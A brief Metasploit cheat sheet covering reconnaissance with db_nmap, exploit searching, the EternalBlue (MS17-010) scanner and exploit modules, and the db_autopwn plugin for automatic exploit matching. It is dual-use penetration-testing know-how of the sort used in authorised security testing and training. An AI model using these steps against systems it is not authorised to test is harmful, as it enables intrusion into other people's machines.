Vulnerability Scanning

# Basic Setup
setg RHOSTS [HOST]
workspace -a [suitable-name]

# nmap for basic recon (results are stored in the current workspace)
db_nmap -sS -sV -O [HOST]
# -sS and -O need raw socket access, so run msfconsole with sudo for this step
hosts
services

Searching for Exploits

# Manual Exploit Search
search type:exploit name:[name]
# Searches the module database for exploits matching the services found. This process can be time-consuming.

# Searchsploit
searchsploit [name]
# Uses the searchsploit tool to search the local Exploit-DB copy for entries matching the service name.

EternalBlue Exploit

# Scan for the vulnerability (auxiliary module, only checks whether the host is affected)
use auxiliary/scanner/smb/smb_ms17_010

# Attempt to exploit
use exploit/windows/smb/ms17_010_eternalblue

Automatic Exploit Matching

# Move the autopwn plugin (db_autopwn is no longer bundled with Metasploit and must be obtained separately)
sudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins

# Load the plugin
load db_autopwn

# Run the autopwn tool
db_autopwn -p -t -PI [PORT]
# Matches the services stored in the database against possible exploit modules by port (-p), lists the matches (-t) and restricts the run to the given port (-PI).

Analyzing Vulnerabilities

# Auto Analysis
analyze
# Analyzes the hosts and services already stored in the database and suggests modules that may apply.

# List Vulnerabilities
vulns
# Displays a list of any vulnerabilities recorded in the database during the scans.
